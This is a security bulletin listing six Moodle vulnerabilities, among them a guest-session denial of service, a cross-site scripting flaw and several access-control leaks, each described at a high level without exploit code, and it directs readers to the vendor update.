SB2024121718 - Multiple vulnerabilities in Moodle

Description

This security bulletin contains information about 6 secuirty vulnerabilities.

1) Resource management error (CVE-ID: CVE-2024-55648)

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to improper management of internal resources within the application when handling guest sessions. A remote attacker can create multiple guest sessions that have a longer timeout compared to regular user sessions and potentially perform a denial of service (DoS) attack.

2) Cross-site scripting (CVE-ID: CVE-2024-55647)

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data in question bank filter. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

3) Improper privilege management (CVE-ID: CVE-2024-55646)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists due to improper privilege management. In a database activity with separate groups mode enabled, users who were not in a group (and did not have permission to access all groups) could see entries from members of all groups in the activity, rather than just entries of users also not in any groups.

4) Information disclosure (CVE-ID: CVE-2024-55645)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists due to the email change confirmation token is available via preference. A remote user or attacker with physical access to the system can obtain the token and use it later to verify the email change without having access to the mailbox.

5) Improper access control (CVE-ID: CVE-2024-55644)

The vulnerability allows a remote user to gain access to sensitive information.

The vulnerability exists due to improper access restrictions on the tag index page. A remote user can see users tagged with a tag regardless of whether they had access to view the users' profiles.

6) Improper access control (CVE-ID: CVE-2024-55643)

The vulnerability allows a remote user to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions within the learning plan web service. A remote user can bypass implemented security restrictions and gain access to sensitive information, such as usernames.

Remediation

Install update from vendor's website.

References

• https://moodle.org/mod/forum/discuss.php?d=464559
• https://moodle.org/mod/forum/discuss.php?d=464558
• https://moodle.org/mod/forum/discuss.php?d=464557
• https://moodle.org/mod/forum/discuss.php?d=464556
• https://moodle.org/mod/forum/discuss.php?d=464555
• https://moodle.org/mod/forum/discuss.php?d=464554